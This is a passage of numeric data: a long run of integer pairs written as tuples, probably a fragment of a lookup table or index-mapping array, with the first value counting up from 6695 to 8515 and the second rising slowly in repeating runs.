(6695, 821),
(6696, 822),
(6697, 822),
(6698, 822),
(6699, 822),
(6700, 822),
(6701, 822),
(6702, 823),
(6703, 823),
(6704, 823),
(6705, 823),
(6706, 823),
(6707, 823),
(6708, 824),
(6709, 824),
(6710, 824),
(6711, 824),
(6712, 824),
(6713, 824),
(6714, 825),
(6715, 825),
(6716, 825),
(6717, 825),
(6718, 825),
(6719, 825),
(6720, 826),
(6721, 826),
(6722, 826),
(6723, 826),
(6724, 826),
(6725, 826),
(6726, 827),
(6727, 827),
(6728, 827),
(6729, 827),
(6730, 827),
(6731, 827),
(6732, 828),
(6733, 828),
(6734, 828),
(6735, 828),
(6736, 828),
(6737, 828),
(6738, 828),
(6739, 828),
(6740, 828),
(6741, 829),
(6742, 829),
(6743, 829),
(6744, 829),
(6745, 829),
(6746, 829),
(6747, 830),
(6748, 830),
(6749, 830),
(6750, 830),
(6751, 830),
(6752, 830),
(6753, 831),
(6754, 831),
(6755, 831),
(6756, 831),
(6757, 831),
(6758, 831),
(6759, 832),
(6760, 832),
(6761, 832),
(6762, 832),
(6763, 832),
(6764, 832),
(6765, 833),
(6766, 833),
(6767, 833),
(6768, 833),
(6769, 833),
(6770, 833),
(6771, 834),
(6772, 834),
(6773, 834),
(6774, 834),
(6775, 834),
(6776, 834),
(6777, 835),
(6778, 835),
(6779, 835),
(6780, 835),
(6781, 835),
(6782, 835),
(6783, 836),
(6784, 836),
(6785, 836),
(6786, 836),
(6787, 836),
(6788, 836),
(6789, 837),
(6790, 837),
(6791, 837),
(6792, 837),
(6793, 837),
(6794, 837),
(6795, 838),
(6796, 838),
(6797, 838),
(6798, 838),
(6799, 838),
(6800, 838),
(6801, 839),
(6802, 839),
(6803, 839),
(6804, 839),
(6805, 839),
(6806, 839),
(6807, 840),
(6808, 840),
(6809, 840),
(6810, 840),
(6811, 840),
(6812, 840),
(6813, 841),
(6814, 841),
(6815, 841),
(6816, 841),
(6817, 841),
(6818, 841),
(6819, 841),
(6820, 841),
(6821, 841),
(6822, 842),
(6823, 842),
(6824, 842),
(6825, 842),
(6826, 842),
(6827, 842),
(6828, 843),
(6829, 843),
(6830, 843),
(6831, 843),
(6832, 843),
(6833, 843),
(6834, 844),
(6835, 844),
(6836, 844),
(6837, 844),
(6838, 844),
(6839, 844),
(6840, 845),
(6841, 845),
(6842, 845),
(6843, 845),
(6844, 845),
(6845, 845),
(6846, 846),
(6847, 846),
(6848, 846),
(6849, 846),
(6850, 846),
(6851, 846),
(6852, 847),
(6853, 847),
(6854, 847),
(6855, 847),
(6856, 847),
(6857, 847),
(6858, 848),
(6859, 848),
(6860, 848),
(6861, 848),
(6862, 848),
(6863, 848),
(6864, 849),
(6865, 849),
(6866, 849),
(6867, 849),
(6868, 849),
(6869, 849),
(6870, 850),
(6871, 850),
(6872, 850),
(6873, 850),
(6874, 850),
(6875, 850),
(6876, 851),
(6877, 851),
(6878, 851),
(6879, 851),
(6880, 851),
(6881, 851),
(6882, 852),
(6883, 852),
(6884, 852),
(6885, 852),
(6886, 852),
(6887, 852),
(6888, 853),
(6889, 853),
(6890, 853),
(6891, 853),
(6892, 853),
(6893, 853),
(6894, 854),
(6895, 854),
(6896, 854),
(6897, 854),
(6898, 854),
(6899, 854),
(6900, 854),
(6901, 854),
(6902, 854),
(6903, 855),
(6904, 855),
(6905, 855),
(6906, 855),
(6907, 855),
(6908, 855),
(6909, 856),
(6910, 856),
(6911, 856),
(6912, 856),
(6913, 856),
(6914, 856),
(6915, 857),
(6916, 857),
(6917, 857),
(6918, 857),
(6919, 857),
(6920, 857),
(6921, 858),
(6922, 858),
(6923, 858),
(6924, 858),
(6925, 858),
(6926, 858),
(6927, 859),
(6928, 859),
(6929, 859),
(6930, 859),
(6931, 859),
(6932, 859),
(6933, 860),
(6934, 861),
(6935, 862),
(6936, 863),
(6937, 864),
(6938, 865),
(6939, 866),
(6940, 867),
(6941, 868),
(6942, 869),
(6943, 870),
(6944, 871),
(6945, 872),
(6946, 873),
(6947, 874),
(6948, 875),
(6949, 876),
(6950, 877),
(6951, 878),
(6952, 879),
(6953, 880),
(6954, 881),
(6955, 882),
(6956, 883),
(6957, 884),
(6958, 885),
(6959, 886),
(6960, 887),
(6961, 888),
(6962, 889),
(6963, 890),
(6964, 891),
(6965, 892),
(6966, 893),
(6967, 894),
(6968, 895),
(6969, 896),
(6970, 897),
(6971, 898),
(6972, 899),
(6973, 900),
(6974, 901),
(6975, 902),
(6976, 903),
(6977, 904),
(6978, 905),
(6979, 906),
(6980, 907),
(6981, 908),
(6982, 909),
(6983, 910),
(6984, 911),
(6985, 912),
(6986, 913),
(6987, 914),
(6988, 915),
(6989, 916),
(6990, 917),
(6991, 918),
(6992, 919),
(6993, 920),
(6994, 921),
(6995, 922),
(6996, 923),
(6997, 924),
(6998, 925),
(6999, 926),
(7000, 927),
(7001, 928),
(7002, 929),
(7003, 930),
(7004, 931),
(7005, 932),
(7006, 933),
(7007, 934),
(7008, 935),
(7009, 936),
(7010, 937),
(7011, 938),
(7012, 939),
(7013, 940),
(7014, 941),
(7015, 942),
(7016, 943),
(7017, 944),
(7018, 945),
(7019, 946),
(7020, 947),
(7021, 948),
(7022, 949),
(7023, 950),
(7024, 951),
(7025, 952),
(7026, 953),
(7027, 954),
(7028, 955),
(7029, 956),
(7030, 957),
(7031, 958),
(7032, 959),
(7033, 860),
(7034, 861),
(7035, 862),
(7036, 863),
(7037, 864),
(7038, 865),
(7039, 866),
(7040, 867),
(7041, 868),
(7042, 869),
(7043, 870),
(7044, 871),
(7045, 872),
(7046, 873),
(7047, 874),
(7048, 875),
(7049, 876),
(7050, 877),
(7051, 878),
(7052, 879),
(7053, 880),
(7054, 881),
(7055, 882),
(7056, 883),
(7057, 884),
(7058, 885),
(7059, 886),
(7060, 887),
(7061, 888),
(7062, 889),
(7063, 890),
(7064, 891),
(7065, 892),
(7066, 893),
(7067, 894),
(7068, 895),
(7069, 896),
(7070, 897),
(7071, 898),
(7072, 899),
(7073, 900),
(7074, 901),
(7075, 902),
(7076, 903),
(7077, 904),
(7078, 905),
(7079, 906),
(7080, 907),
(7081, 908),
(7082, 909),
(7083, 910),
(7084, 911),
(7085, 912),
(7086, 913),
(7087, 914),
(7088, 915),
(7089, 916),
(7090, 917),
(7091, 918),
(7092, 919),
(7093, 920),
(7094, 921),
(7095, 922),
(7096, 923),
(7097, 924),
(7098, 925),
(7099, 926),
(7100, 927),
(7101, 928),
(7102, 929),
(7103, 930),
(7104, 931),
(7105, 932),
(7106, 933),
(7107, 934),
(7108, 935),
(7109, 936),
(7110, 937),
(7111, 938),
(7112, 939),
(7113, 940),
(7114, 941),
(7115, 942),
(7116, 943),
(7117, 944),
(7118, 945),
(7119, 946),
(7120, 947),
(7121, 948),
(7122, 949),
(7123, 950),
(7124, 951),
(7125, 952),
(7126, 953),
(7127, 954),
(7128, 955),
(7129, 956),
(7130, 957),
(7131, 958),
(7132, 959),
(7133, 860),
(7134, 860),
(7135, 860),
(7136, 860),
(7137, 860),
(7138, 860),
(7139, 861),
(7140, 861),
(7141, 861),
(7142, 861),
(7143, 861),
(7144, 861),
(7145, 862),
(7146, 862),
(7147, 862),
(7148, 862),
(7149, 862),
(7150, 862),
(7151, 863),
(7152, 863),
(7153, 863),
(7154, 863),
(7155, 863),
(7156, 863),
(7157, 864),
(7158, 864),
(7159, 864),
(7160, 864),
(7161, 864),
(7162, 864),
(7163, 865),
(7164, 865),
(7165, 865),
(7166, 865),
(7167, 865),
(7168, 865),
(7169, 866),
(7170, 866),
(7171, 866),
(7172, 866),
(7173, 866),
(7174, 866),
(7175, 867),
(7176, 867),
(7177, 867),
(7178, 867),
(7179, 867),
(7180, 867),
(7181, 867),
(7182, 867),
(7183, 867),
(7184, 868),
(7185, 868),
(7186, 868),
(7187, 868),
(7188, 868),
(7189, 868),
(7190, 869),
(7191, 869),
(7192, 869),
(7193, 869),
(7194, 869),
(7195, 869),
(7196, 870),
(7197, 870),
(7198, 870),
(7199, 870),
(7200, 870),
(7201, 870),
(7202, 871),
(7203, 871),
(7204, 871),
(7205, 871),
(7206, 871),
(7207, 871),
(7208, 872),
(7209, 872),
(7210, 872),
(7211, 872),
(7212, 872),
(7213, 872),
(7214, 873),
(7215, 873),
(7216, 873),
(7217, 873),
(7218, 873),
(7219, 873),
(7220, 874),
(7221, 874),
(7222, 874),
(7223, 874),
(7224, 874),
(7225, 874),
(7226, 875),
(7227, 875),
(7228, 875),
(7229, 875),
(7230, 875),
(7231, 875),
(7232, 876),
(7233, 876),
(7234, 876),
(7235, 876),
(7236, 876),
(7237, 876),
(7238, 877),
(7239, 877),
(7240, 877),
(7241, 877),
(7242, 877),
(7243, 877),
(7244, 878),
(7245, 878),
(7246, 878),
(7247, 878),
(7248, 878),
(7249, 878),
(7250, 879),
(7251, 879),
(7252, 879),
(7253, 879),
(7254, 879),
(7255, 879),
(7256, 880),
(7257, 880),
(7258, 880),
(7259, 880),
(7260, 880),
(7261, 880),
(7262, 880),
(7263, 880),
(7264, 880),
(7265, 881),
(7266, 881),
(7267, 881),
(7268, 881),
(7269, 881),
(7270, 881),
(7271, 882),
(7272, 882),
(7273, 882),
(7274, 882),
(7275, 882),
(7276, 882),
(7277, 883),
(7278, 883),
(7279, 883),
(7280, 883),
(7281, 883),
(7282, 883),
(7283, 884),
(7284, 884),
(7285, 884),
(7286, 884),
(7287, 884),
(7288, 884),
(7289, 885),
(7290, 885),
(7291, 885),
(7292, 885),
(7293, 885),
(7294, 885),
(7295, 886),
(7296, 886),
(7297, 886),
(7298, 886),
(7299, 886),
(7300, 886),
(7301, 887),
(7302, 887),
(7303, 887),
(7304, 887),
(7305, 887),
(7306, 887),
(7307, 888),
(7308, 888),
(7309, 888),
(7310, 888),
(7311, 888),
(7312, 888),
(7313, 889),
(7314, 889),
(7315, 889),
(7316, 889),
(7317, 889),
(7318, 889),
(7319, 890),
(7320, 890),
(7321, 890),
(7322, 890),
(7323, 890),
(7324, 890),
(7325, 891),
(7326, 891),
(7327, 891),
(7328, 891),
(7329, 891),
(7330, 891),
(7331, 892),
(7332, 892),
(7333, 892),
(7334, 892),
(7335, 892),
(7336, 892),
(7337, 893),
(7338, 893),
(7339, 893),
(7340, 893),
(7341, 893),
(7342, 893),
(7343, 893),
(7344, 893),
(7345, 893),
(7346, 894),
(7347, 894),
(7348, 894),
(7349, 894),
(7350, 894),
(7351, 894),
(7352, 895),
(7353, 895),
(7354, 895),
(7355, 895),
(7356, 895),
(7357, 895),
(7358, 896),
(7359, 896),
(7360, 896),
(7361, 896),
(7362, 896),
(7363, 896),
(7364, 897),
(7365, 897),
(7366, 897),
(7367, 897),
(7368, 897),
(7369, 897),
(7370, 898),
(7371, 898),
(7372, 898),
(7373, 898),
(7374, 898),
(7375, 898),
(7376, 899),
(7377, 899),
(7378, 899),
(7379, 899),
(7380, 899),
(7381, 899),
(7382, 900),
(7383, 900),
(7384, 900),
(7385, 900),
(7386, 900),
(7387, 900),
(7388, 901),
(7389, 901),
(7390, 901),
(7391, 901),
(7392, 901),
(7393, 901),
(7394, 902),
(7395, 902),
(7396, 902),
(7397, 902),
(7398, 902),
(7399, 902),
(7400, 903),
(7401, 903),
(7402, 903),
(7403, 903),
(7404, 903),
(7405, 903),
(7406, 904),
(7407, 904),
(7408, 904),
(7409, 904),
(7410, 904),
(7411, 904),
(7412, 905),
(7413, 905),
(7414, 905),
(7415, 905),
(7416, 905),
(7417, 905),
(7418, 906),
(7419, 906),
(7420, 906),
(7421, 906),
(7422, 906),
(7423, 906),
(7424, 906),
(7425, 906),
(7426, 906),
(7427, 907),
(7428, 907),
(7429, 907),
(7430, 907),
(7431, 907),
(7432, 907),
(7433, 908),
(7434, 908),
(7435, 908),
(7436, 908),
(7437, 908),
(7438, 908),
(7439, 909),
(7440, 909),
(7441, 909),
(7442, 909),
(7443, 909),
(7444, 909),
(7445, 910),
(7446, 910),
(7447, 910),
(7448, 910),
(7449, 910),
(7450, 910),
(7451, 911),
(7452, 911),
(7453, 911),
(7454, 911),
(7455, 911),
(7456, 911),
(7457, 911),
(7458, 911),
(7459, 911),
(7460, 912),
(7461, 912),
(7462, 912),
(7463, 912),
(7464, 912),
(7465, 912),
(7466, 913),
(7467, 913),
(7468, 913),
(7469, 913),
(7470, 913),
(7471, 913),
(7472, 914),
(7473, 914),
(7474, 914),
(7475, 914),
(7476, 914),
(7477, 914),
(7478, 915),
(7479, 915),
(7480, 915),
(7481, 915),
(7482, 915),
(7483, 915),
(7484, 916),
(7485, 916),
(7486, 916),
(7487, 916),
(7488, 916),
(7489, 916),
(7490, 917),
(7491, 917),
(7492, 917),
(7493, 917),
(7494, 917),
(7495, 917),
(7496, 918),
(7497, 918),
(7498, 918),
(7499, 918),
(7500, 918),
(7501, 918),
(7502, 919),
(7503, 919),
(7504, 919),
(7505, 919),
(7506, 919),
(7507, 919),
(7508, 920),
(7509, 920),
(7510, 920),
(7511, 920),
(7512, 920),
(7513, 920),
(7514, 921),
(7515, 921),
(7516, 921),
(7517, 921),
(7518, 921),
(7519, 921),
(7520, 922),
(7521, 922),
(7522, 922),
(7523, 922),
(7524, 922),
(7525, 922),
(7526, 923),
(7527, 923),
(7528, 923),
(7529, 923),
(7530, 923),
(7531, 923),
(7532, 924),
(7533, 924),
(7534, 924),
(7535, 924),
(7536, 924),
(7537, 924),
(7538, 924),
(7539, 924),
(7540, 924),
(7541, 925),
(7542, 925),
(7543, 925),
(7544, 925),
(7545, 925),
(7546, 925),
(7547, 926),
(7548, 926),
(7549, 926),
(7550, 926),
(7551, 926),
(7552, 926),
(7553, 927),
(7554, 927),
(7555, 927),
(7556, 927),
(7557, 927),
(7558, 927),
(7559, 928),
(7560, 928),
(7561, 928),
(7562, 928),
(7563, 928),
(7564, 928),
(7565, 929),
(7566, 929),
(7567, 929),
(7568, 929),
(7569, 929),
(7570, 929),
(7571, 930),
(7572, 930),
(7573, 930),
(7574, 930),
(7575, 930),
(7576, 930),
(7577, 931),
(7578, 931),
(7579, 931),
(7580, 931),
(7581, 931),
(7582, 931),
(7583, 932),
(7584, 932),
(7585, 932),
(7586, 932),
(7587, 932),
(7588, 932),
(7589, 933),
(7590, 933),
(7591, 933),
(7592, 933),
(7593, 933),
(7594, 933),
(7595, 934),
(7596, 934),
(7597, 934),
(7598, 934),
(7599, 934),
(7600, 934),
(7601, 935),
(7602, 935),
(7603, 935),
(7604, 935),
(7605, 935),
(7606, 935),
(7607, 936),
(7608, 936),
(7609, 936),
(7610, 936),
(7611, 936),
(7612, 936),
(7613, 937),
(7614, 937),
(7615, 937),
(7616, 937),
(7617, 937),
(7618, 937),
(7619, 937),
(7620, 937),
(7621, 937),
(7622, 938),
(7623, 938),
(7624, 938),
(7625, 938),
(7626, 938),
(7627, 938),
(7628, 939),
(7629, 939),
(7630, 939),
(7631, 939),
(7632, 939),
(7633, 939),
(7634, 940),
(7635, 940),
(7636, 940),
(7637, 940),
(7638, 940),
(7639, 940),
(7640, 941),
(7641, 941),
(7642, 941),
(7643, 941),
(7644, 941),
(7645, 941),
(7646, 942),
(7647, 942),
(7648, 942),
(7649, 942),
(7650, 942),
(7651, 942),
(7652, 943),
(7653, 943),
(7654, 943),
(7655, 943),
(7656, 943),
(7657, 943),
(7658, 944),
(7659, 944),
(7660, 944),
(7661, 944),
(7662, 944),
(7663, 944),
(7664, 945),
(7665, 945),
(7666, 945),
(7667, 945),
(7668, 945),
(7669, 945),
(7670, 946),
(7671, 946),
(7672, 946),
(7673, 946),
(7674, 946),
(7675, 946),
(7676, 947),
(7677, 947),
(7678, 947),
(7679, 947),
(7680, 947),
(7681, 947),
(7682, 948),
(7683, 948),
(7684, 948),
(7685, 948),
(7686, 948),
(7687, 948),
(7688, 949),
(7689, 949),
(7690, 949),
(7691, 949),
(7692, 949),
(7693, 949),
(7694, 950),
(7695, 950),
(7696, 950),
(7697, 950),
(7698, 950),
(7699, 950),
(7700, 950),
(7701, 950),
(7702, 950),
(7703, 951),
(7704, 951),
(7705, 951),
(7706, 951),
(7707, 951),
(7708, 951),
(7709, 952),
(7710, 952),
(7711, 952),
(7712, 952),
(7713, 952),
(7714, 952),
(7715, 953),
(7716, 953),
(7717, 953),
(7718, 953),
(7719, 953),
(7720, 953),
(7721, 954),
(7722, 954),
(7723, 954),
(7724, 954),
(7725, 954),
(7726, 954),
(7727, 955),
(7728, 955),
(7729, 955),
(7730, 955),
(7731, 955),
(7732, 955),
(7733, 956),
(7734, 956),
(7735, 956),
(7736, 956),
(7737, 956),
(7738, 956),
(7739, 957),
(7740, 957),
(7741, 957),
(7742, 957),
(7743, 957),
(7744, 957),
(7745, 958),
(7746, 958),
(7747, 958),
(7748, 958),
(7749, 958),
(7750, 958),
(7751, 959),
(7752, 959),
(7753, 959),
(7754, 959),
(7755, 959),
(7756, 959),
(7757, 960),
(7758, 961),
(7759, 962),
(7760, 963),
(7761, 964),
(7762, 965),
(7763, 966),
(7764, 967),
(7765, 968),
(7766, 969),
(7767, 970),
(7768, 971),
(7769, 972),
(7770, 973),
(7771, 974),
(7772, 975),
(7773, 976),
(7774, 977),
(7775, 978),
(7776, 979),
(7777, 980),
(7778, 981),
(7779, 982),
(7780, 983),
(7781, 984),
(7782, 985),
(7783, 986),
(7784, 987),
(7785, 988),
(7786, 989),
(7787, 990),
(7788, 991),
(7789, 992),
(7790, 993),
(7791, 994),
(7792, 995),
(7793, 996),
(7794, 997),
(7795, 998),
(7796, 999),
(7797, 1000),
(7798, 1001),
(7799, 1002),
(7800, 1003),
(7801, 1004),
(7802, 1005),
(7803, 1006),
(7804, 1007),
(7805, 1008),
(7806, 1009),
(7807, 1010),
(7808, 1011),
(7809, 1012),
(7810, 1013),
(7811, 1014),
(7812, 1015),
(7813, 1016),
(7814, 1017),
(7815, 1018),
(7816, 1019),
(7817, 1020),
(7818, 1021),
(7819, 1022),
(7820, 1023),
(7821, 1024),
(7822, 1025),
(7823, 1026),
(7824, 1027),
(7825, 1028),
(7826, 1029),
(7827, 1030),
(7828, 1031),
(7829, 1032),
(7830, 1033),
(7831, 1034),
(7832, 1035),
(7833, 1036),
(7834, 1037),
(7835, 1038),
(7836, 1039),
(7837, 1040),
(7838, 1041),
(7839, 1042),
(7840, 1043),
(7841, 1044),
(7842, 1045),
(7843, 1046),
(7844, 1047),
(7845, 1048),
(7846, 1049),
(7847, 1050),
(7848, 1051),
(7849, 1052),
(7850, 1053),
(7851, 1054),
(7852, 1055),
(7853, 1056),
(7854, 1057),
(7855, 1058),
(7856, 1059),
(7857, 960),
(7858, 961),
(7859, 962),
(7860, 963),
(7861, 964),
(7862, 965),
(7863, 966),
(7864, 967),
(7865, 968),
(7866, 969),
(7867, 970),
(7868, 971),
(7869, 972),
(7870, 973),
(7871, 974),
(7872, 975),
(7873, 976),
(7874, 977),
(7875, 978),
(7876, 979),
(7877, 980),
(7878, 981),
(7879, 982),
(7880, 983),
(7881, 984),
(7882, 985),
(7883, 986),
(7884, 987),
(7885, 988),
(7886, 989),
(7887, 990),
(7888, 991),
(7889, 992),
(7890, 993),
(7891, 994),
(7892, 995),
(7893, 996),
(7894, 997),
(7895, 998),
(7896, 999),
(7897, 1000),
(7898, 1001),
(7899, 1002),
(7900, 1003),
(7901, 1004),
(7902, 1005),
(7903, 1006),
(7904, 1007),
(7905, 1008),
(7906, 1009),
(7907, 1010),
(7908, 1011),
(7909, 1012),
(7910, 1013),
(7911, 1014),
(7912, 1015),
(7913, 1016),
(7914, 1017),
(7915, 1018),
(7916, 1019),
(7917, 1020),
(7918, 1021),
(7919, 1022),
(7920, 1023),
(7921, 1024),
(7922, 1025),
(7923, 1026),
(7924, 1027),
(7925, 1028),
(7926, 1029),
(7927, 1030),
(7928, 1031),
(7929, 1032),
(7930, 1033),
(7931, 1034),
(7932, 1035),
(7933, 1036),
(7934, 1037),
(7935, 1038),
(7936, 1039),
(7937, 1040),
(7938, 1041),
(7939, 1042),
(7940, 1043),
(7941, 1044),
(7942, 1045),
(7943, 1046),
(7944, 1047),
(7945, 1048),
(7946, 1049),
(7947, 1050),
(7948, 1051),
(7949, 1052),
(7950, 1053),
(7951, 1054),
(7952, 1055),
(7953, 1056),
(7954, 1057),
(7955, 1058),
(7956, 1059),
(7957, 960),
(7958, 960),
(7959, 960),
(7960, 960),
(7961, 960),
(7962, 960),
(7963, 961),
(7964, 961),
(7965, 961),
(7966, 961),
(7967, 961),
(7968, 961),
(7969, 962),
(7970, 962),
(7971, 962),
(7972, 962),
(7973, 962),
(7974, 962),
(7975, 963),
(7976, 963),
(7977, 963),
(7978, 963),
(7979, 963),
(7980, 963),
(7981, 963),
(7982, 963),
(7983, 963),
(7984, 964),
(7985, 964),
(7986, 964),
(7987, 964),
(7988, 964),
(7989, 964),
(7990, 965),
(7991, 965),
(7992, 965),
(7993, 965),
(7994, 965),
(7995, 965),
(7996, 966),
(7997, 966),
(7998, 966),
(7999, 966),
(8000, 966),
(8001, 966),
(8002, 967),
(8003, 967),
(8004, 967),
(8005, 967),
(8006, 967),
(8007, 967),
(8008, 968),
(8009, 968),
(8010, 968),
(8011, 968),
(8012, 968),
(8013, 968),
(8014, 969),
(8015, 969),
(8016, 969),
(8017, 969),
(8018, 969),
(8019, 969),
(8020, 970),
(8021, 970),
(8022, 970),
(8023, 970),
(8024, 970),
(8025, 970),
(8026, 971),
(8027, 971),
(8028, 971),
(8029, 971),
(8030, 971),
(8031, 971),
(8032, 972),
(8033, 972),
(8034, 972),
(8035, 972),
(8036, 972),
(8037, 972),
(8038, 973),
(8039, 973),
(8040, 973),
(8041, 973),
(8042, 973),
(8043, 973),
(8044, 974),
(8045, 974),
(8046, 974),
(8047, 974),
(8048, 974),
(8049, 974),
(8050, 975),
(8051, 975),
(8052, 975),
(8053, 975),
(8054, 975),
(8055, 975),
(8056, 976),
(8057, 976),
(8058, 976),
(8059, 976),
(8060, 976),
(8061, 976),
(8062, 976),
(8063, 976),
(8064, 976),
(8065, 977),
(8066, 977),
(8067, 977),
(8068, 977),
(8069, 977),
(8070, 977),
(8071, 978),
(8072, 978),
(8073, 978),
(8074, 978),
(8075, 978),
(8076, 978),
(8077, 979),
(8078, 979),
(8079, 979),
(8080, 979),
(8081, 979),
(8082, 979),
(8083, 980),
(8084, 980),
(8085, 980),
(8086, 980),
(8087, 980),
(8088, 980),
(8089, 981),
(8090, 981),
(8091, 981),
(8092, 981),
(8093, 981),
(8094, 981),
(8095, 982),
(8096, 982),
(8097, 982),
(8098, 982),
(8099, 982),
(8100, 982),
(8101, 983),
(8102, 983),
(8103, 983),
(8104, 983),
(8105, 983),
(8106, 983),
(8107, 984),
(8108, 984),
(8109, 984),
(8110, 984),
(8111, 984),
(8112, 984),
(8113, 985),
(8114, 985),
(8115, 985),
(8116, 985),
(8117, 985),
(8118, 985),
(8119, 986),
(8120, 986),
(8121, 986),
(8122, 986),
(8123, 986),
(8124, 986),
(8125, 987),
(8126, 987),
(8127, 987),
(8128, 987),
(8129, 987),
(8130, 987),
(8131, 988),
(8132, 988),
(8133, 988),
(8134, 988),
(8135, 988),
(8136, 988),
(8137, 989),
(8138, 989),
(8139, 989),
(8140, 989),
(8141, 989),
(8142, 989),
(8143, 989),
(8144, 989),
(8145, 989),
(8146, 990),
(8147, 990),
(8148, 990),
(8149, 990),
(8150, 990),
(8151, 990),
(8152, 991),
(8153, 991),
(8154, 991),
(8155, 991),
(8156, 991),
(8157, 991),
(8158, 992),
(8159, 992),
(8160, 992),
(8161, 992),
(8162, 992),
(8163, 992),
(8164, 993),
(8165, 993),
(8166, 993),
(8167, 993),
(8168, 993),
(8169, 993),
(8170, 994),
(8171, 994),
(8172, 994),
(8173, 994),
(8174, 994),
(8175, 994),
(8176, 995),
(8177, 995),
(8178, 995),
(8179, 995),
(8180, 995),
(8181, 995),
(8182, 996),
(8183, 996),
(8184, 996),
(8185, 996),
(8186, 996),
(8187, 996),
(8188, 997),
(8189, 997),
(8190, 997),
(8191, 997),
(8192, 997),
(8193, 997),
(8194, 998),
(8195, 998),
(8196, 998),
(8197, 998),
(8198, 998),
(8199, 998),
(8200, 999),
(8201, 999),
(8202, 999),
(8203, 999),
(8204, 999),
(8205, 999),
(8206, 1000),
(8207, 1000),
(8208, 1000),
(8209, 1000),
(8210, 1000),
(8211, 1000),
(8212, 1001),
(8213, 1001),
(8214, 1001),
(8215, 1001),
(8216, 1001),
(8217, 1001),
(8218, 1002),
(8219, 1002),
(8220, 1002),
(8221, 1002),
(8222, 1002),
(8223, 1002),
(8224, 1002),
(8225, 1002),
(8226, 1002),
(8227, 1003),
(8228, 1003),
(8229, 1003),
(8230, 1003),
(8231, 1003),
(8232, 1003),
(8233, 1004),
(8234, 1004),
(8235, 1004),
(8236, 1004),
(8237, 1004),
(8238, 1004),
(8239, 1005),
(8240, 1005),
(8241, 1005),
(8242, 1005),
(8243, 1005),
(8244, 1005),
(8245, 1006),
(8246, 1006),
(8247, 1006),
(8248, 1006),
(8249, 1006),
(8250, 1006),
(8251, 1007),
(8252, 1007),
(8253, 1007),
(8254, 1007),
(8255, 1007),
(8256, 1007),
(8257, 1008),
(8258, 1008),
(8259, 1008),
(8260, 1008),
(8261, 1008),
(8262, 1008),
(8263, 1009),
(8264, 1009),
(8265, 1009),
(8266, 1009),
(8267, 1009),
(8268, 1009),
(8269, 1010),
(8270, 1010),
(8271, 1010),
(8272, 1010),
(8273, 1010),
(8274, 1010),
(8275, 1011),
(8276, 1011),
(8277, 1011),
(8278, 1011),
(8279, 1011),
(8280, 1011),
(8281, 1012),
(8282, 1012),
(8283, 1012),
(8284, 1012),
(8285, 1012),
(8286, 1012),
(8287, 1013),
(8288, 1013),
(8289, 1013),
(8290, 1013),
(8291, 1013),
(8292, 1013),
(8293, 1014),
(8294, 1014),
(8295, 1014),
(8296, 1014),
(8297, 1014),
(8298, 1014),
(8299, 1015),
(8300, 1015),
(8301, 1015),
(8302, 1015),
(8303, 1015),
(8304, 1015),
(8305, 1015),
(8306, 1015),
(8307, 1015),
(8308, 1016),
(8309, 1016),
(8310, 1016),
(8311, 1016),
(8312, 1016),
(8313, 1016),
(8314, 1017),
(8315, 1017),
(8316, 1017),
(8317, 1017),
(8318, 1017),
(8319, 1017),
(8320, 1018),
(8321, 1018),
(8322, 1018),
(8323, 1018),
(8324, 1018),
(8325, 1018),
(8326, 1019),
(8327, 1019),
(8328, 1019),
(8329, 1019),
(8330, 1019),
(8331, 1019),
(8332, 1020),
(8333, 1020),
(8334, 1020),
(8335, 1020),
(8336, 1020),
(8337, 1020),
(8338, 1021),
(8339, 1021),
(8340, 1021),
(8341, 1021),
(8342, 1021),
(8343, 1021),
(8344, 1022),
(8345, 1022),
(8346, 1022),
(8347, 1022),
(8348, 1022),
(8349, 1022),
(8350, 1023),
(8351, 1023),
(8352, 1023),
(8353, 1023),
(8354, 1023),
(8355, 1023),
(8356, 1024),
(8357, 1024),
(8358, 1024),
(8359, 1024),
(8360, 1024),
(8361, 1024),
(8362, 1025),
(8363, 1025),
(8364, 1025),
(8365, 1025),
(8366, 1025),
(8367, 1025),
(8368, 1026),
(8369, 1026),
(8370, 1026),
(8371, 1026),
(8372, 1026),
(8373, 1026),
(8374, 1027),
(8375, 1027),
(8376, 1027),
(8377, 1027),
(8378, 1027),
(8379, 1027),
(8380, 1028),
(8381, 1028),
(8382, 1028),
(8383, 1028),
(8384, 1028),
(8385, 1028),
(8386, 1028),
(8387, 1028),
(8388, 1028),
(8389, 1029),
(8390, 1029),
(8391, 1029),
(8392, 1029),
(8393, 1029),
(8394, 1029),
(8395, 1030),
(8396, 1030),
(8397, 1030),
(8398, 1030),
(8399, 1030),
(8400, 1030),
(8401, 1031),
(8402, 1031),
(8403, 1031),
(8404, 1031),
(8405, 1031),
(8406, 1031),
(8407, 1032),
(8408, 1032),
(8409, 1032),
(8410, 1032),
(8411, 1032),
(8412, 1032),
(8413, 1033),
(8414, 1033),
(8415, 1033),
(8416, 1033),
(8417, 1033),
(8418, 1033),
(8419, 1034),
(8420, 1034),
(8421, 1034),
(8422, 1034),
(8423, 1034),
(8424, 1034),
(8425, 1035),
(8426, 1035),
(8427, 1035),
(8428, 1035),
(8429, 1035),
(8430, 1035),
(8431, 1036),
(8432, 1036),
(8433, 1036),
(8434, 1036),
(8435, 1036),
(8436, 1036),
(8437, 1037),
(8438, 1037),
(8439, 1037),
(8440, 1037),
(8441, 1037),
(8442, 1037),
(8443, 1038),
(8444, 1038),
(8445, 1038),
(8446, 1038),
(8447, 1038),
(8448, 1038),
(8449, 1039),
(8450, 1039),
(8451, 1039),
(8452, 1039),
(8453, 1039),
(8454, 1039),
(8455, 1040),
(8456, 1040),
(8457, 1040),
(8458, 1040),
(8459, 1040),
(8460, 1040),
(8461, 1041),
(8462, 1041),
(8463, 1041),
(8464, 1041),
(8465, 1041),
(8466, 1041),
(8467, 1041),
(8468, 1041),
(8469, 1041),
(8470, 1042),
(8471, 1042),
(8472, 1042),
(8473, 1042),
(8474, 1042),
(8475, 1042),
(8476, 1043),
(8477, 1043),
(8478, 1043),
(8479, 1043),
(8480, 1043),
(8481, 1043),
(8482, 1044),
(8483, 1044),
(8484, 1044),
(8485, 1044),
(8486, 1044),
(8487, 1044),
(8488, 1045),
(8489, 1045),
(8490, 1045),
(8491, 1045),
(8492, 1045),
(8493, 1045),
(8494, 1046),
(8495, 1046),
(8496, 1046),
(8497, 1046),
(8498, 1046),
(8499, 1046),
(8500, 1047),
(8501, 1047),
(8502, 1047),
(8503, 1047),
(8504, 1047),
(8505, 1047),
(8506, 1048),
(8507, 1048),
(8508, 1048),
(8509, 1048),
(8510, 1048),
(8511, 1048),
(8512, 1049),
(8513, 1049),
(8514, 1049),
(8515, 1049),
